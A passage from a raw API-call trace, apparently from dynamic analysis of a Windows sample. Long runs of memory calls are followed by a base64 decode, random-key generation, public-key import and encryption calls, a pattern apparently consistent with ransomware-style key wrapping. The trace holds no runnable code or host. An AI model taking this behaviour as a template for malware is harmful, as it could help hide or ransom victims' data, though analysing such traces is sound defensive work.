(_Buf=0x3f65349, _Val=32, _MaxCount=0xe) returned 0x0 [0155.619] malloc (_Size=0xf) returned 0x3648c68 [0155.619] free (_Block=0x0) [0155.619] free (_Block=0x0) [0155.619] free (_Block=0x3648e18) [0155.619] free (_Block=0x3648c68) [0155.619] free (_Block=0x3e22398) [0155.619] memchr (_Buf=0x3d80260, _Val=32, _MaxCount=0x1a) returned 0x3d80278 [0155.619] malloc (_Size=0x19) returned 0x3d800d0 [0155.619] free (_Block=0x0) [0155.619] malloc (_Size=0x40) returned 0x3e220c8 [0155.619] free (_Block=0x0) [0155.619] free (_Block=0x0) [0155.619] memchr (_Buf=0x3d80279, _Val=32, _MaxCount=0x1) returned 0x0 [0155.619] malloc (_Size=0x2) returned 0x3f4c098 [0155.620] free (_Block=0x0) [0155.620] free (_Block=0x0) [0155.620] free (_Block=0x3d800d0) [0155.620] free (_Block=0x3f4c098) [0155.620] free (_Block=0x3e220c8) [0155.620] memchr (_Buf=0x3d80198, _Val=32, _MaxCount=0x1c) returned 0x3d801a2 [0155.620] malloc (_Size=0xb) returned 0x3648ea8 [0155.620] free (_Block=0x0) [0155.620] malloc (_Size=0x40) returned 0x3e22500 [0155.620] free (_Block=0x0) [0155.620] free (_Block=0x0) [0155.620] memchr (_Buf=0x3d801a3, _Val=32, _MaxCount=0x11) returned 0x3d801aa [0155.620] malloc (_Size=0x8) returned 0x3f4c048 [0155.620] free (_Block=0x0) [0155.620] free (_Block=0x0) [0155.620] memchr (_Buf=0x3d801ab, _Val=32, _MaxCount=0x9) returned 0x0 [0155.620] malloc (_Size=0xa) returned 0x3648c68 [0155.620] free (_Block=0x0) [0155.620] free (_Block=0x0) [0155.620] free (_Block=0x3648ea8) [0155.620] free (_Block=0x3f4c048) [0155.620] free (_Block=0x3648c68) [0155.620] free (_Block=0x3e22500) [0155.620] memchr (_Buf=0x60ea08, _Val=32, _MaxCount=0x40) returned 0x0 [0155.620] malloc (_Size=0x41) returned 0x60e9b8 [0155.620] free (_Block=0x0) [0155.620] malloc (_Size=0x40) returned 0x3e22740 [0155.620] free (_Block=0x0) [0155.620] free (_Block=0x0) [0155.621] free (_Block=0x60e9b8) [0155.621] free (_Block=0x3e22740) [0155.621] memchr (_Buf=0x60ec38, _Val=32, _MaxCount=0x40) returned 0x0 [0155.621] malloc (_Size=0x41) returned 0x60ec88 [0155.621] free (_Block=0x0) [0155.621] malloc (_Size=0x40) returned 0x3e221a0 [0155.621] free (_Block=0x0) [0155.621] free (_Block=0x0) [0155.621] free (_Block=0x60ec88) [0155.621] free (_Block=0x3e221a0) [0155.621] memchr (_Buf=0x3648c80, _Val=32, _MaxCount=0xc) returned 0x0 [0155.621] malloc (_Size=0xd) returned 0x3648e18 [0155.621] free (_Block=0x0) [0155.621] malloc (_Size=0x40) returned 0x3e22668 [0155.621] free (_Block=0x0) [0155.621] free (_Block=0x0) [0155.621] free (_Block=0x3648e18) [0155.621] free (_Block=0x3e22668) [0155.621] memchr (_Buf=0x3d800a8, _Val=32, _MaxCount=0x1a) returned 0x3d800b0 [0155.621] malloc (_Size=0x9) returned 0x3648ec0 [0155.621] free (_Block=0x0) [0155.621] malloc (_Size=0x40) returned 0x3e22398 [0155.621] free (_Block=0x0) [0155.621] free (_Block=0x0) [0155.621] memchr (_Buf=0x3d800b1, _Val=32, _MaxCount=0x11) returned 0x3d800b8 [0155.621] malloc (_Size=0x8) returned 0x3f4c068 [0155.621] free (_Block=0x0) [0155.621] free (_Block=0x0) [0155.621] memchr (_Buf=0x3d800b9, _Val=32, _MaxCount=0x9) returned 0x0 [0155.622] malloc (_Size=0xa) returned 0x3648c68 [0155.622] free (_Block=0x0) [0155.622] free (_Block=0x0) [0155.622] free (_Block=0x3648ec0) [0155.622] free (_Block=0x3f4c068) [0155.622] free (_Block=0x3648c68) [0155.622] free (_Block=0x3e22398) [0155.622] memchr (_Buf=0x3f65480, _Val=32, _MaxCount=0x12) returned 0x0 [0155.622] malloc (_Size=0x13) returned 0x3f653e0 [0155.622] free (_Block=0x0) [0155.622] malloc (_Size=0x40) returned 0x3e22110 [0155.622] free (_Block=0x0) [0155.622] free (_Block=0x0) [0155.622] free (_Block=0x3f653e0) [0155.622] free (_Block=0x3e22110) [0155.622] memchr (_Buf=0x60e918, _Val=32, _MaxCount=0x40) returned 0x60e91f [0155.622] malloc (_Size=0x8) returned 0x3f4bfd8 [0155.622] free (_Block=0x0) [0155.622] malloc (_Size=0x40) returned 0x3e22668 [0155.622] free (_Block=0x0) [0155.622] free (_Block=0x0) [0155.622] memchr (_Buf=0x60e920, _Val=32, _MaxCount=0x38) returned 0x60e93e [0155.622] malloc (_Size=0x1f) returned 0x3d800d0 [0155.622] free (_Block=0x0) [0155.622] free (_Block=0x0) [0155.622] memchr (_Buf=0x60e93f, _Val=32, _MaxCount=0x19) returned 0x0 [0155.622] malloc (_Size=0x1a) returned 0x3d801c0 [0155.622] free (_Block=0x0) [0155.622] free (_Block=0x0) [0155.623] free (_Block=0x3f4bfd8) [0155.623] free (_Block=0x3d800d0) [0155.623] free (_Block=0x3d801c0) [0155.623] free (_Block=0x3e22668) [0155.623] memchr (_Buf=0x3e22278, _Val=32, _MaxCount=0x3b) returned 0x3e22286 [0155.623] malloc (_Size=0xf) returned 0x3648ea8 [0155.623] free (_Block=0x0) [0155.623] malloc (_Size=0x40) returned 0x3e22590 [0155.623] free (_Block=0x0) [0155.623] free (_Block=0x0) [0155.623] memchr (_Buf=0x3e22287, _Val=32, _MaxCount=0x2c) returned 0x0 [0155.623] malloc (_Size=0x2d) returned 0x3624988 [0155.623] free (_Block=0x0) [0155.623] free (_Block=0x0) [0155.623] CryptStringToBinaryA (in: pszString="SWPGQxpnxdMhZcDjGBnYq+Rp5w4GgrSqdzgqwG340Sw=", cchString=0x2c, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x316f488, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x316f488, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0155.623] malloc (_Size=0x20) returned 0x3d800d0 [0155.623] free (_Block=0x0) [0155.623] CryptStringToBinaryA (in: pszString="SWPGQxpnxdMhZcDjGBnYq+Rp5w4GgrSqdzgqwG340Sw=", cchString=0x2c, dwFlags=0x6, pbBinary=0x3d800d0, pcbBinary=0x316f488, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d800d0, pcbBinary=0x316f488, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0155.623] malloc (_Size=0x20) returned 0x3d801c0 [0155.623] free (_Block=0x0) [0155.623] free (_Block=0x0) [0155.623] free (_Block=0x3d800d0) [0155.623] free (_Block=0x3648ea8) [0155.623] free (_Block=0x3624988) [0155.623] free (_Block=0x3e22590) [0155.623] memchr (_Buf=0x3f654a0, _Val=32, _MaxCount=0x12) returned 0x3f654a6 [0155.623] malloc (_Size=0x7) returned 0x3f4c0e8 [0155.624] free (_Block=0x0) [0155.624] malloc (_Size=0x40) returned 0x3e22080 [0155.624] free (_Block=0x0) [0155.624] free (_Block=0x0) [0155.624] memchr (_Buf=0x3f654a7, _Val=32, _MaxCount=0xb) returned 0x0 [0155.624] malloc (_Size=0xc) returned 0x3648d88 [0155.624] free (_Block=0x0) [0155.624] free (_Block=0x0) [0155.624] free (_Block=0x3f4c0e8) [0155.624] free (_Block=0x3648d88) [0155.624] free (_Block=0x3e22080) [0155.624] memchr (_Buf=0x3f652c0, _Val=32, _MaxCount=0x17) returned 0x3f652c6 [0155.624] malloc (_Size=0x7) returned 0x3f4c078 [0155.624] free (_Block=0x0) [0155.624] malloc (_Size=0x40) returned 0x3e221e8 [0155.624] free (_Block=0x0) [0155.624] free (_Block=0x0) [0155.624] memchr (_Buf=0x3f652c7, _Val=32, _MaxCount=0x10) returned 0x0 [0155.624] malloc (_Size=0x11) returned 0x3f653e0 [0155.624] free (_Block=0x0) [0155.624] free (_Block=0x0) [0155.624] free (_Block=0x3f4c078) [0155.624] free (_Block=0x3f653e0) [0155.624] free (_Block=0x3e221e8) [0155.624] memchr (_Buf=0x3f65300, _Val=32, _MaxCount=0x14) returned 0x3f65306 [0155.624] malloc (_Size=0x7) returned 0x3f4bf78 [0155.624] free (_Block=0x0) [0155.624] malloc (_Size=0x40) returned 0x3e22110 [0155.624] free (_Block=0x0) [0155.625] free (_Block=0x0) [0155.625] memchr (_Buf=0x3f65307, _Val=32, _MaxCount=0xd) returned 0x0 [0155.625] malloc (_Size=0xe) returned 0x3648e18 [0155.625] free (_Block=0x0) [0155.625] free (_Block=0x0) [0155.625] free (_Block=0x3f4bf78) [0155.625] free (_Block=0x3648e18) [0155.625] free (_Block=0x3e22110) [0155.625] memchr (_Buf=0x3f65320, _Val=32, _MaxCount=0x17) returned 0x3f65326 [0155.625] malloc (_Size=0x7) returned 0x3f4bff8 [0155.625] free (_Block=0x0) [0155.625] malloc (_Size=0x40) returned 0x3e223e0 [0155.625] free (_Block=0x0) [0155.625] free (_Block=0x0) [0155.625] memchr (_Buf=0x3f65327, _Val=32, _MaxCount=0x10) returned 0x0 [0155.625] malloc (_Size=0x11) returned 0x3f65500 [0155.625] free (_Block=0x0) [0155.625] free (_Block=0x0) [0155.625] free (_Block=0x3f4bff8) [0155.626] free (_Block=0x3f65500) [0155.626] free (_Block=0x3e223e0) [0155.626] memchr (_Buf=0x3f65140, _Val=32, _MaxCount=0x13) returned 0x3f65146 [0155.626] malloc (_Size=0x7) returned 0x3f4c098 [0155.626] free (_Block=0x0) [0155.626] malloc (_Size=0x40) returned 0x3e22788 [0155.626] free (_Block=0x0) [0155.626] free (_Block=0x0) [0155.626] memchr (_Buf=0x3f65147, _Val=32, _MaxCount=0xc) returned 0x0 [0155.626] malloc (_Size=0xd) returned 0x3648e18 [0155.626] free (_Block=0x0) [0155.626] free (_Block=0x0) [0155.626] free (_Block=0x3f4c098) [0155.626] free (_Block=0x3648e18) [0155.626] free (_Block=0x3e22788) [0155.626] memchr (_Buf=0x3f65360, _Val=32, _MaxCount=0x16) returned 0x3f65366 [0155.626] malloc (_Size=0x7) returned 0x3f4c0f8 [0155.626] free (_Block=0x0) [0155.626] malloc (_Size=0x40) returned 0x3e22080 [0155.626] free (_Block=0x0) [0155.626] free (_Block=0x0) [0155.626] memchr (_Buf=0x3f65367, _Val=32, _MaxCount=0xf) returned 0x0 [0155.626] malloc (_Size=0x10) returned 0x3648d88 [0155.626] free (_Block=0x0) [0155.626] free (_Block=0x0) [0155.626] free (_Block=0x3f4c0f8) [0155.626] free (_Block=0x3648d88) [0155.626] free (_Block=0x3e22080) [0155.626] memchr (_Buf=0x3f65380, _Val=32, _MaxCount=0x16) returned 0x3f65386 [0155.627] malloc (_Size=0x7) returned 0x3f4bf28 [0155.627] free (_Block=0x0) [0155.627] malloc (_Size=0x40) returned 0x3e22740 [0155.627] free (_Block=0x0) [0155.627] free (_Block=0x0) [0155.627] memchr (_Buf=0x3f65387, _Val=32, _MaxCount=0xf) returned 0x0 [0155.627] malloc (_Size=0x10) returned 0x3648e18 [0155.627] free (_Block=0x0) [0155.627] free (_Block=0x0) [0155.627] free (_Block=0x3f4bf28) [0155.627] free (_Block=0x3648e18) [0155.627] free (_Block=0x3e22740) [0155.627] memchr (_Buf=0x3648f20, _Val=32, _MaxCount=0xb) returned 0x3648f26 [0155.627] malloc (_Size=0x7) returned 0x3f4c028 [0155.627] free (_Block=0x0) [0155.627] malloc (_Size=0x40) returned 0x3e22668 [0155.627] free (_Block=0x0) [0155.627] free (_Block=0x0) [0155.627] memchr (_Buf=0x3648f27, _Val=32, _MaxCount=0x4) returned 0x0 [0155.627] malloc (_Size=0x5) returned 0x3f4bf68 [0155.627] free (_Block=0x0) [0155.627] free (_Block=0x0) [0155.627] free (_Block=0x3f4c028) [0155.627] free (_Block=0x3f4bf68) [0155.627] free (_Block=0x3e22668) [0155.627] memchr (_Buf=0x3648db8, _Val=32, _MaxCount=0xb) returned 0x3648dbe [0155.627] malloc (_Size=0x7) returned 0x3f4c088 [0155.627] free (_Block=0x0) [0155.628] malloc (_Size=0x40) returned 0x3e22398 [0155.628] free (_Block=0x0) [0155.628] free (_Block=0x0) [0155.628] memchr (_Buf=0x3648dbf, _Val=32, _MaxCount=0x4) returned 0x0 [0155.628] malloc (_Size=0x5) returned 0x3f4bf28 [0155.628] free (_Block=0x0) [0155.628] free (_Block=0x0) [0155.628] free (_Block=0x3f4c088) [0155.628] free (_Block=0x3f4bf28) [0155.628] free (_Block=0x3e22398) [0155.628] memchr (_Buf=0x3648da0, _Val=32, _MaxCount=0xb) returned 0x3648da6 [0155.628] malloc (_Size=0x7) returned 0x3f4c0d8 [0155.628] free (_Block=0x0) [0155.628] malloc (_Size=0x40) returned 0x3e222c0 [0155.628] free (_Block=0x0) [0155.628] free (_Block=0x0) [0155.628] memchr (_Buf=0x3648da7, _Val=32, _MaxCount=0x4) returned 0x0 [0155.628] malloc (_Size=0x5) returned 0x3f4c058 [0155.628] free (_Block=0x0) [0155.628] free (_Block=0x0) [0155.628] free (_Block=0x3f4c0d8) [0155.628] free (_Block=0x3f4c058) [0155.628] free (_Block=0x3e222c0) [0155.628] memchr (_Buf=0x3648cc8, _Val=32, _MaxCount=0xc) returned 0x3648cce [0155.628] malloc (_Size=0x7) returned 0x3f4bf18 [0155.628] free (_Block=0x0) [0155.628] malloc (_Size=0x40) returned 0x3e22398 [0155.628] free (_Block=0x0) [0155.628] free (_Block=0x0) [0155.629] memchr (_Buf=0x3648ccf, _Val=32, _MaxCount=0x5) returned 0x0 [0155.629] malloc (_Size=0x6) returned 0x3f4c058 [0155.629] free (_Block=0x0) [0155.629] free (_Block=0x0) [0155.629] free (_Block=0x3f4bf18) [0155.629] free (_Block=0x3f4c058) [0155.629] free (_Block=0x3e22398) [0155.629] memchr (_Buf=0x3648e78, _Val=32, _MaxCount=0xc) returned 0x3648e7e [0155.629] malloc (_Size=0x7) returned 0x3f4c038 [0155.629] free (_Block=0x0) [0155.629] malloc (_Size=0x40) returned 0x3e22590 [0155.629] free (_Block=0x0) [0155.629] free (_Block=0x0) [0155.629] memchr (_Buf=0x3648e7f, _Val=32, _MaxCount=0x5) returned 0x0 [0155.629] malloc (_Size=0x6) returned 0x3f4c048 [0155.629] free (_Block=0x0) [0155.629] free (_Block=0x0) [0155.629] free (_Block=0x3f4c038) [0155.629] free (_Block=0x3f4c048) [0155.629] free (_Block=0x3e22590) [0155.629] memchr (_Buf=0x3648d70, _Val=32, _MaxCount=0xd) returned 0x3648d76 [0155.629] malloc (_Size=0x7) returned 0x3f4bfd8 [0155.629] free (_Block=0x0) [0155.629] malloc (_Size=0x40) returned 0x3e22788 [0155.629] free (_Block=0x0) [0155.629] free (_Block=0x0) [0155.629] memchr (_Buf=0x3648d77, _Val=32, _MaxCount=0x6) returned 0x0 [0155.630] malloc (_Size=0x7) returned 0x3f4c078 [0155.630] free (_Block=0x0) [0155.630] free (_Block=0x0) [0155.630] free (_Block=0x3f4bfd8) [0155.630] free (_Block=0x3f4c078) [0155.630] free (_Block=0x3e22788) [0155.630] memchr (_Buf=0x3648ed8, _Val=32, _MaxCount=0xd) returned 0x3648ede [0155.630] malloc (_Size=0x7) returned 0x3f4bf78 [0155.630] free (_Block=0x0) [0155.630] malloc (_Size=0x40) returned 0x3e22500 [0155.630] free (_Block=0x0) [0155.630] free (_Block=0x0) [0155.630] memchr (_Buf=0x3648edf, _Val=32, _MaxCount=0x6) returned 0x0 [0155.630] malloc (_Size=0x7) returned 0x3f4c0c8 [0155.630] free (_Block=0x0) [0155.630] free (_Block=0x0) [0155.630] free (_Block=0x3f4bf78) [0155.630] free (_Block=0x3f4c0c8) [0155.630] free (_Block=0x3e22500) [0155.630] memchr (_Buf=0x3648d28, _Val=32, _MaxCount=0xd) returned 0x3648d2e [0155.630] malloc (_Size=0x7) returned 0x3f4c008 [0155.630] free (_Block=0x0) [0155.630] malloc (_Size=0x40) returned 0x3e22500 [0155.630] free (_Block=0x0) [0155.630] free (_Block=0x0) [0155.630] memchr (_Buf=0x3648d2f, _Val=32, _MaxCount=0x6) returned 0x0 [0155.630] malloc (_Size=0x7) returned 0x3f4c018 [0155.630] free (_Block=0x0) [0155.631] free (_Block=0x0) [0155.631] free (_Block=0x3f4c008) [0155.631] free (_Block=0x3f4c018) [0155.631] free (_Block=0x3e22500) [0155.631] memchr (_Buf=0x3648d58, _Val=32, _MaxCount=0xd) returned 0x3648d5e [0155.631] malloc (_Size=0x7) returned 0x3f4bf58 [0155.631] free (_Block=0x0) [0155.631] malloc (_Size=0x40) returned 0x3e22500 [0155.631] free (_Block=0x0) [0155.631] free (_Block=0x0) [0155.631] memchr (_Buf=0x3648d5f, _Val=32, _MaxCount=0x6) returned 0x0 [0155.631] malloc (_Size=0x7) returned 0x3f4bf78 [0155.631] free (_Block=0x0) [0155.631] free (_Block=0x0) [0155.631] free (_Block=0x3f4bf58) [0155.631] free (_Block=0x3f4bf78) [0155.631] free (_Block=0x3e22500) [0155.631] memchr (_Buf=0x3f653c0, _Val=32, _MaxCount=0x12) returned 0x3f653c6 [0155.631] malloc (_Size=0x7) returned 0x3f4c098 [0155.631] free (_Block=0x0) [0155.631] malloc (_Size=0x40) returned 0x3e22500 [0155.631] free (_Block=0x0) [0155.631] free (_Block=0x0) [0155.631] memchr (_Buf=0x3f653c7, _Val=32, _MaxCount=0xb) returned 0x0 [0155.631] malloc (_Size=0xc) returned 0x3648c68 [0155.631] free (_Block=0x0) [0155.631] free (_Block=0x0) [0155.631] free (_Block=0x3f4c098) [0155.631] free (_Block=0x3648c68) [0155.632] free (_Block=0x3e22500) [0155.632] memchr (_Buf=0x3648f38, _Val=32, _MaxCount=0xd) returned 0x3648f3e [0155.632] malloc (_Size=0x7) returned 0x3f4bfd8 [0155.632] free (_Block=0x0) [0155.632] malloc (_Size=0x40) returned 0x3e22230 [0155.632] free (_Block=0x0) [0155.632] free (_Block=0x0) [0155.632] memchr (_Buf=0x3648f3f, _Val=32, _MaxCount=0x6) returned 0x0 [0155.632] malloc (_Size=0x7) returned 0x3f4c098 [0155.632] free (_Block=0x0) [0155.632] free (_Block=0x0) [0155.632] free (_Block=0x3f4bfd8) [0155.632] free (_Block=0x3f4c098) [0155.632] free (_Block=0x3e22230) [0155.632] memchr (_Buf=0x3648e60, _Val=32, _MaxCount=0xd) returned 0x3648e66 [0155.632] malloc (_Size=0x7) returned 0x3f4c0b8 [0155.632] free (_Block=0x0) [0155.632] malloc (_Size=0x40) returned 0x3e22740 [0155.632] free (_Block=0x0) [0155.632] free (_Block=0x0) [0155.632] memchr (_Buf=0x3648e67, _Val=32, _MaxCount=0x6) returned 0x0 [0155.632] malloc (_Size=0x7) returned 0x3f4bf18 [0155.632] free (_Block=0x0) [0155.632] free (_Block=0x0) [0155.632] free (_Block=0x3f4c0b8) [0155.632] free (_Block=0x3f4bf18) [0155.632] free (_Block=0x3e22740) [0155.632] memchr (_Buf=0x3648e90, _Val=32, _MaxCount=0xe) returned 0x3648e96 [0155.632] malloc (_Size=0x7) returned 0x3f4c008 [0155.633] free (_Block=0x0) [0155.633] malloc (_Size=0x40) returned 0x3e22398 [0155.633] free (_Block=0x0) [0155.633] free (_Block=0x0) [0155.633] memchr (_Buf=0x3648e97, _Val=32, _MaxCount=0x7) returned 0x0 [0155.633] malloc (_Size=0x8) returned 0x3f4bf58 [0155.633] free (_Block=0x0) [0155.633] free (_Block=0x0) [0155.633] free (_Block=0x3f4c008) [0155.633] free (_Block=0x3f4bf58) [0155.633] free (_Block=0x3e22398) [0155.633] memchr (_Buf=0x3648c50, _Val=32, _MaxCount=0xe) returned 0x3648c56 [0155.633] malloc (_Size=0x7) returned 0x3f4bfd8 [0155.633] free (_Block=0x0) [0155.633] malloc (_Size=0x40) returned 0x3e22500 [0155.633] free (_Block=0x0) [0155.633] free (_Block=0x0) [0155.633] memchr (_Buf=0x3648c57, _Val=32, _MaxCount=0x7) returned 0x0 [0155.633] malloc (_Size=0x8) returned 0x3f4bf28 [0155.633] free (_Block=0x0) [0155.633] free (_Block=0x0) [0155.633] free (_Block=0x3f4bfd8) [0155.633] free (_Block=0x3f4bf28) [0155.633] free (_Block=0x3e22500) [0155.633] memchr (_Buf=0x3648dd0, _Val=32, _MaxCount=0xa) returned 0x3648dd6 [0155.633] malloc (_Size=0x7) returned 0x3f4c0b8 [0155.633] free (_Block=0x0) [0155.633] malloc (_Size=0x40) returned 0x3e226f8 [0155.634] free (_Block=0x0) [0155.634] free (_Block=0x0) [0155.634] memchr (_Buf=0x3648dd7, _Val=32, _MaxCount=0x3) returned 0x0 [0155.634] malloc (_Size=0x4) returned 0x3f4bf98 [0155.634] free (_Block=0x0) [0155.634] free (_Block=0x0) [0155.634] free (_Block=0x3f4c0b8) [0155.634] free (_Block=0x3f4bf98) [0155.634] free (_Block=0x3e226f8) [0155.634] memchr (_Buf=0x3f654c0, _Val=32, _MaxCount=0x14) returned 0x0 [0155.634] malloc (_Size=0x15) returned 0x3f653e0 [0155.634] free (_Block=0x0) [0155.634] malloc (_Size=0x40) returned 0x3e226b0 [0155.634] free (_Block=0x0) [0155.634] free (_Block=0x0) [0155.634] free (_Block=0x3f653e0) [0155.634] free (_Block=0x3e226b0) [0155.634] memchr (_Buf=0x60b6c8, _Val=32, _MaxCount=0x69) returned 0x60b6da [0155.634] malloc (_Size=0x13) returned 0x3f653e0 [0155.634] free (_Block=0x0) [0155.634] malloc (_Size=0x40) returned 0x3e222c0 [0155.634] free (_Block=0x0) [0155.634] free (_Block=0x0) [0155.634] memchr (_Buf=0x60b6db, _Val=32, _MaxCount=0x56) returned 0x0 [0155.634] malloc (_Size=0x57) returned 0x60ef60 [0155.634] free (_Block=0x0) [0155.634] free (_Block=0x0) [0155.634] free (_Block=0x3f653e0) [0155.634] free (_Block=0x60ef60) [0155.634] free (_Block=0x3e222c0) [0155.635] memchr (_Buf=0x3f65440, _Val=32, _MaxCount=0x10) returned 0x0 [0155.635] malloc (_Size=0x11) returned 0x3f653e0 [0155.635] free (_Block=0x0) [0155.635] malloc (_Size=0x40) returned 0x3e22080 [0155.635] free (_Block=0x0) [0155.635] free (_Block=0x0) [0155.635] free (_Block=0x3f653e0) [0155.635] free (_Block=0x3e22080) [0155.635] memchr (_Buf=0x3d80350, _Val=32, _MaxCount=0x19) returned 0x3d8035a [0155.635] malloc (_Size=0xb) returned 0x3648e18 [0155.635] free (_Block=0x0) [0155.635] malloc (_Size=0x40) returned 0x3e22500 [0155.635] free (_Block=0x0) [0155.635] free (_Block=0x0) [0155.635] memchr (_Buf=0x3d8035b, _Val=32, _MaxCount=0xe) returned 0x0 [0155.635] malloc (_Size=0xf) returned 0x3648c68 [0155.635] free (_Block=0x0) [0155.635] free (_Block=0x0) [0155.635] free (_Block=0x3648e18) [0155.635] free (_Block=0x3648c68) [0155.635] free (_Block=0x3e22500) [0155.635] memchr (_Buf=0x60e968, _Val=32, _MaxCount=0x40) returned 0x0 [0155.635] malloc (_Size=0x41) returned 0x60ea58 [0155.635] free (_Block=0x0) [0155.635] malloc (_Size=0x40) returned 0x3e223e0 [0155.635] free (_Block=0x0) [0155.635] free (_Block=0x0) [0155.635] free (_Block=0x60ea58) [0155.636] free (_Block=0x3e223e0) [0155.636] memchr (_Buf=0x60ee18, _Val=32, _MaxCount=0x40) returned 0x0 [0155.636] malloc (_Size=0x41) returned 0x60e828 [0155.636] free (_Block=0x0) [0155.636] malloc (_Size=0x40) returned 0x3e22620 [0155.636] free (_Block=0x0) [0155.636] free (_Block=0x0) [0155.636] free (_Block=0x60e828) [0155.636] free (_Block=0x3e22620) [0155.636] memchr (_Buf=0x3624bb8, _Val=32, _MaxCount=0x2c) returned 0x0 [0155.636] malloc (_Size=0x2d) returned 0x36249c0 [0155.636] free (_Block=0x0) [0155.636] malloc (_Size=0x40) returned 0x3e226f8 [0155.636] free (_Block=0x0) [0155.636] free (_Block=0x0) [0155.636] free (_Block=0x36249c0) [0155.636] free (_Block=0x3e226f8) [0155.636] memchr (_Buf=0x3f65460, _Val=32, _MaxCount=0x17) returned 0x3f65468 [0155.636] malloc (_Size=0x9) returned 0x3648d40 [0155.636] free (_Block=0x0) [0155.636] malloc (_Size=0x40) returned 0x3e22398 [0155.636] free (_Block=0x0) [0155.636] free (_Block=0x0) [0155.636] memchr (_Buf=0x3f65469, _Val=32, _MaxCount=0xe) returned 0x0 [0155.636] malloc (_Size=0xf) returned 0x3648cb0 [0155.636] free (_Block=0x0) [0155.636] free (_Block=0x0) [0155.636] free (_Block=0x3648d40) [0155.637] free (_Block=0x3648cb0) [0155.637] free (_Block=0x3e22398) [0155.637] free (_Block=0x3691d20) [0155.637] free (_Block=0x3624670) [0155.637] free (_Block=0x3f651e0) [0155.637] free (_Block=0x3d803c8) [0155.637] free (_Block=0x60e8c8) [0155.637] free (_Block=0x60ebe8) [0155.637] free (_Block=0x3e22308) [0155.637] free (_Block=0x3d802d8) [0155.637] free (_Block=0x3e224b8) [0155.637] free (_Block=0x3d80300) [0155.637] free (_Block=0x6066d8) [0155.637] free (_Block=0x3d802b0) [0155.637] free (_Block=0x3e22350) [0155.637] free (_Block=0x3648f08) [0155.637] free (_Block=0x3624ad8) [0155.637] free (_Block=0x60af20) [0155.637] free (_Block=0x3648e00) [0155.637] free (_Block=0x3d803f0) [0155.637] free (_Block=0x60eaf8) [0155.637] free (_Block=0x60eb48) [0155.637] free (_Block=0x3e22470) [0155.637] free (_Block=0x3d80120) [0155.637] free (_Block=0x3648de8) [0155.637] free (_Block=0x3d80148) [0155.637] free (_Block=0x60ed28) [0155.637] free (_Block=0x60eb98) [0155.637] free (_Block=0x3e22038) [0155.638] free (_Block=0x3d80238) [0155.638] free (_Block=0x3f65280) [0155.638] free (_Block=0x3d80080) [0155.638] free (_Block=0x60ed78) [0155.638] free (_Block=0x60edc8) [0155.638] free (_Block=0x3624838) [0155.638] free (_Block=0x3f65340) [0155.638] free (_Block=0x3d80260) [0155.638] free (_Block=0x3d80198) [0155.638] free (_Block=0x60ea08) [0155.638] free (_Block=0x60ec38) [0155.638] free (_Block=0x3648c80) [0155.638] free (_Block=0x3d800a8) [0155.638] free (_Block=0x3f65480) [0155.638] free (_Block=0x60e918) [0155.638] free (_Block=0x3e22278) [0155.638] free (_Block=0x3f654a0) [0155.638] free (_Block=0x3f652c0) [0155.638] free (_Block=0x3f65300) [0155.638] free (_Block=0x3f65320) [0155.638] free (_Block=0x3f65140) [0155.638] free (_Block=0x3f65360) [0155.638] free (_Block=0x3f65380) [0155.638] free (_Block=0x3648f20) [0155.638] free (_Block=0x3648db8) [0155.639] free (_Block=0x3648da0) [0155.639] free (_Block=0x3648cc8) [0155.639] free (_Block=0x3648e78) [0155.639] free (_Block=0x3648d70) [0155.639] free (_Block=0x3648ed8) [0155.639] free (_Block=0x3648d28) [0155.639] free (_Block=0x3648d58) [0155.639] free (_Block=0x3f653c0) [0155.639] free (_Block=0x3648f38) [0155.640] free (_Block=0x3648e60) [0155.640] free (_Block=0x3648e90) [0155.640] free (_Block=0x3648c50) [0155.640] free (_Block=0x3648dd0) [0155.640] free (_Block=0x3f654c0) [0155.640] free (_Block=0x60b6c8) [0155.640] free (_Block=0x3f65440) [0155.640] free (_Block=0x3d80350) [0155.640] free (_Block=0x60e968) [0155.640] free (_Block=0x60ee18) [0155.640] free (_Block=0x3624bb8) [0155.640] free (_Block=0x3f65460) [0155.640] free (_Block=0x3691270) [0155.640] free (_Block=0x60cdc0) [0155.640] malloc (_Size=0x10) returned 0x3648f08 [0155.640] free (_Block=0x0) [0155.640] CryptGenRandom (in: hProv=0x3cf450, dwLen=0x10, pbBuffer=0x3648f08 | out: pbBuffer=0x3648f08) returned 1 [0155.640] malloc (_Size=0x40) returned 0x3e22548 [0155.640] free (_Block=0x0) [0155.640] malloc (_Size=0x104) returned 0x3df0550 [0155.640] free (_Block=0x3e22548) [0155.641] CryptDecodeObject (in: dwCertEncodingType=0x1, lpszStructType=0x13, pbEncoded=0x3d819a8, cbEncoded=0x8c, dwFlags=0x0, pvStructInfo=0x316f444, pcbStructInfo=0x316f41c | out: pvStructInfo=0x316f444, pcbStructInfo=0x316f41c) returned 1 [0155.641] CryptImportKey (in: hProv=0x3cf450, pbData=0x316f444, dwDataLen=0x94, hPubKey=0x0, dwFlags=0x1, phKey=0x316f440 | out: phKey=0x316f440*=0x3e0b98) returned 1 [0155.641] malloc (_Size=0x80) returned 0x609ad8 [0155.641] free (_Block=0x0) [0155.641] CryptEncrypt (in: hKey=0x3e0b98, hHash=0x0, Final=1, dwFlags=0x40, pbData=0x609ad8*, pdwDataLen=0x316f410*=0x56, dwBufLen=0x80 | out: pbData=0x609ad8*, pdwDataLen=0x316f410*=0x80) returned 1 [0155.641] CryptDestroyKey (hKey=0x3e0b98) returned 1 [0155.641] CryptImportKey (in: hProv=0x3cf450, pbData=0x316f4e0, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x316f4dc | out: phKey=0x316f4dc*=0x3e0b98) returned 1 [0155.641] CryptSetKeyParam (hKey=0x3e0b98, dwParam=0x4, pbData=0x74199484*=0x2, dwFlags=0x0) returned 1 [0155.641] CryptEncrypt (in: hKey=0x3e0b98, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x316f3f0*, pdwDataLen=0x316f354*=0x10, dwBufLen=0x10 | out: pbData=0x316f3f0*, pdwDataLen=0x316f354*=0x10) returned 1 [0155.641] CryptEncrypt (in: hKey=0x3e0b98, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x316f3f0*, pdwDataLen=0x316f354*=0x10, dwBufLen=0x10 | out: pbData=0x316f3f0*, pdwDataLen=0x316f354*=0x10) returned 1 